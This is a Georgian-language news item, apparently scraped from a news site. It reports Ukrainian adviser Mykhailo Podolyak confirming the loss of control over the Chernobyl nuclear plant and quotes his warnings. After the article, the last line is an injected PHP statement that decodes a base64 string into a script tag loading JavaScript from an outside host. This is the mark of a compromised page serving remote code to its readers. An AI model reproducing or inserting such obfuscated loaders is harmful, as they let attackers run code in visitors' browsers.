celsiusi
ავერსი საქკაბელი
უკრაინის პრეზიდენტის აპარატის უფროსის მრჩეველმა მიხაილო პოდოლიაკმა დაადასტურა ინფორმაცია ოკუპანტების მიერ ჩერნობილის ატომური  ელექტროსადგურის დაკავების შესახებ.
 
"სასტიკი ბრძოლის შემდეგ ჩვენ ჩერნობილის ობიექტზე  კონტროლი დავკარგეთ. ჩერნობილის ატომური ელექტროსადგურის ობიექტების და ატომური ნარჩენების საცავის მდგომარეობა უცნობია.
 
ამ მიმართულებით რუსების აბსოლუტურად უაზრო თავდასხმის შემდეგ, შეუძლებელია იმის თქმა, რომ ჩერნობილის ატომური ელექტროსადგური უსაფრთხოდაა. ეს არის ერთ-ერთი ყველაზე სერიოზული საფრთხე დღეს ევროპისთვის.
 
თუ რუსების ჩვევებს გავითვალისწინებთ,  ისინი ალბათ უკვე ამზადებენ პროვოკაციებს ჩერნობილის ატომურ ელექტროსადგურზე,  ან გამოიყენებენ თავდასხმის დროს ობიექტებზე მიყენებული დაზიანებებით და  ამაში უკრაინას დაადანაშაულებენ, ან თვითონ დააზიანებენ ამ უდავოდ ყველაზე საშიშ ობიექტებს," - განაცხადა პოდოლიაკმა.
 
 
 
 
738
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");